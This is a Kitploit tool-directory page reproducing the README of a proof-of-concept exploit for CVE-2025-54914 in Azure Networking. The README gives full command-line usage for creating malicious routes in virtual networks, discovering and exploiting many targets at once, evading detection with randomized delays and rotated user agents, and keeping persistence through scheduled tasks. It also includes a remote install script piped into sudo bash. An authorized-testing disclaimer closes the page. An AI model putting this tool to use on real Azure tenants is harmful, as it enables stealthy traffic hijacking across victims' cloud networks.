Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-54914-PoC — Exploit for CVE-2025-54914 in Azure Networking, creating malicious routes with evasion, persistence, multi-target scanning, and reporting for authorized security testing. | Kitploit
Tools/GitHubGitHub/ash1996x/cve-2025-54914-poc
ReconnaissancePersistence MechanismsVulnerability AnalysisExploitationIDS/IPS EvasionPenetration TestingCloud Security
GitHubash1996x/cve-2025-54914-poc

CVE-2025-54914-PoC

Exploit for CVE-2025-54914 in Azure Networking, creating malicious routes with evasion, persistence, multi-target scanning, and reporting for authorized security testing.

View Repository
44311 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-54914 Azure Route Exploit

Overview

This is an improved implementation of the CVE-2025-54914 Azure Networking Route exploit. This version maintains the core CVE functionality while adding more features including persistence, evasion, multi-target scanning, and error handling.

Features

Core CVE Functionality

  • Route Creation: Creates malicious routes in Azure virtual networks
  • Route Deletion: Removes created routes for cleanup
  • API Compatibility: Works with Azure Management API 2025-09-01
  • Authentication: Supports Azure CLI and manual token authentication

Features

  • Evasion Techniques: Random delays, user agent rotation, request obfuscation
  • Persistence: Scheduled task creation, continuous monitoring mode
  • Multi-Target Scanning: Concurrent scanning and exploitation of multiple targets
  • Comprehensive Reporting: Detailed reports with success/failure analysis
  • Error Handling: Graceful failure handling and recovery
  • Configuration Management: JSON-based target configuration
  • Target Discovery: Automatic discovery of vulnerable resources
  • Risk Assessment: Vulnerability analysis and risk scoring

Installation

Prerequisites

# Install Python dependencies
pip install requests

# Install Azure CLI (for authentication)
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash

Setup

# Make scripts executable
chmod +x exploit.py
chmod +x exploit_utils.py

# Authenticate with Azure
az login

Usage

Basic Usage

Single Target Exploitation

# Create route on single target
python exploit.py \
    --subscription-id "12345678-1234-1234-1234-123456789012" \
    --resource-group "production-rg" \
    --vnet-name "prod-vnet" \
    --subnet-name "prod-subnet" \
    --address-prefix "10.0.1.0/24" \
    --next-hop-ip "10.0.2.5"

# Delete route
python exploit.py \
    --subscription-id "12345678-1234-1234-1234-123456789012" \
    --resource-group "production-rg" \
    --vnet-name "prod-vnet" \
    --subnet-name "prod-subnet" \
    --route-name "exploit-route-1" \
    --operation delete

Multi-Target Exploitation

# Create configuration file
python exploit_utils.py discover --output targets.json

# Exploit all targets
python exploit.py --targets-file targets.json --operation create

Scan Mode

# Scan targets without exploitation
python exploit.py --targets-file targets.json --scan-only

Persistence Mode

# Enable persistence with 30-minute intervals
python exploit.py --targets-file targets.json --persistence-mode --interval 30

Advanced Usage

Evasion and Stealth

# Custom delay ranges for evasion
python exploit.py \
    --targets-file targets.json \
    --delay-min 1.0 \
    --delay-max 5.0 \
    --max-workers 5

Dry Run Mode

# Test without actual exploitation
python exploit.py --targets-file targets.json --dry-run

Detailed Logging

# Enable debug logging
python exploit.py \
    --targets-file targets.json \
    --log-level DEBUG \
    --log-file exploit.log

Configuration

Target Configuration Format

{
  "targets": [
    {
      "subscription_id": "12345678-1234-1234-1234-123456789012",
      "resource_group": "production-rg",
      "vnet_name": "prod-vnet",
      "subnet_name": "prod-subnet",
      "route_name": "exploit-route-1",
      "address_prefix": "10.0.1.0/24",
      "next_hop_type": "VirtualAppliance",
      "next_hop_ip": "10.0.2.5",
      "api_version": "2025-09-01",
      "priority": 1
    }
  ],
  "metadata": {
    "description": "Target configuration for CVE-2025-54914",
    "created": "2025-01-09",
    "version": "1.0"
  }
}

Environment Variables

# Azure access token (alternative to Azure CLI)
export AZURE_ACCESS_TOKEN="your_token_here"

# Log level
export LOG_LEVEL="INFO"

Utility Scripts

Target Discovery

# Discover all accessible targets
python exploit_utils.py discover --output discovered_targets.json

# Discover specific subscriptions
python exploit_utils.py discover \
    --subscription-ids "sub1" "sub2" \
    --output targets.json \
    --report discovery_report.txt

Configuration Generation

# Generate exploit configuration from discovered targets
python exploit_utils.py config \
    --input discovered_targets.json \
    --output exploit_config.json \
    --address-prefix "10.0.1.0/24" \
    --next-hop-ip "10.0.2.5"

Vulnerability Analysis

# Analyze targets for risk assessment
python exploit_utils.py analyze \
    --input targets.json \
    --output vulnerability_report.txt

Security Features

Evasion Techniques

  • Request Timing: Random delays between requests
  • User Agent Rotation: Multiple browser user agents
  • Header Obfuscation: Realistic HTTP headers
  • SSL Verification: Proper certificate validation

Persistence Mechanisms

  • Scheduled Tasks: Windows scheduled task creation
  • Continuous Mode: Long-running persistence
  • Session Management: State preservation across runs
  • Configuration Persistence: Settings saved to disk

Error Handling

  • Graceful Degradation: Continues on individual failures
  • Timeout Protection: Prevents hanging requests
  • Signal Handling: Clean shutdown on interruption
  • Resource Cleanup: Automatic cleanup on exit

Reporting

Exploit Reports

  • Operation Results: Success/failure for each target
  • Timing Information: Execution timestamps
  • Error Details: Detailed error messages
  • Summary Statistics: Overall success rates

Discovery Reports

  • Target Inventory: Complete list of discovered resources
  • Subscription Breakdown: Targets grouped by subscription
  • Resource Details: VNet, subnet, and location information

Vulnerability Analysis

  • Risk Assessment: High/medium/low risk categorization
  • Production Indicators: Identification of production environments
  • Tag Analysis: Risk scoring based on resource tags

Best Practices

Operational Security

  1. Use Dry Run: Always test with --dry-run first
  2. Limit Scope: Start with non-production environments
  3. Monitor Logs: Review logs for unexpected behavior
  4. Clean Up: Remove created routes after testing

Performance Optimization

  1. Worker Limits: Adjust --max-workers based on system capacity
  2. Delay Tuning: Balance stealth vs. speed with delay settings
  3. Batch Processing: Use target files for large-scale operations
  4. Resource Monitoring: Monitor system resources during execution

Error Recovery

  1. Check Logs: Review error messages for troubleshooting
  2. Verify Permissions: Ensure proper Azure permissions
  3. Network Connectivity: Verify internet connectivity
  4. Token Validity: Check Azure CLI authentication status

Troubleshooting

Common Issues

Authentication Errors

# Re-authenticate with Azure
az login

# Check current account
az account show

# List accessible subscriptions
az account list

Permission Errors

# Check required permissions
az role assignment list --assignee $(az account show --query user.name -o tsv)

Network Errors

# Test connectivity
curl -I https://management.azure.com

# Check proxy settings
echo $HTTP_PROXY
echo $HTTPS_PROXY

Debug Mode

# Enable detailed logging
python exploit.py --log-level DEBUG --log-file debug.log

# Check log file
tail -f debug.log

Legal and Ethical Considerations

⚠️ IMPORTANT: This tool is for authorized security testing only.

  • Authorization Required: Only use on systems you own or have explicit permission to test
  • Legal Compliance: Ensure compliance with local laws and regulations
  • Responsible Disclosure: Report vulnerabilities through proper channels
  • Educational Use: This tool is intended for educational and research purposes
Download Tool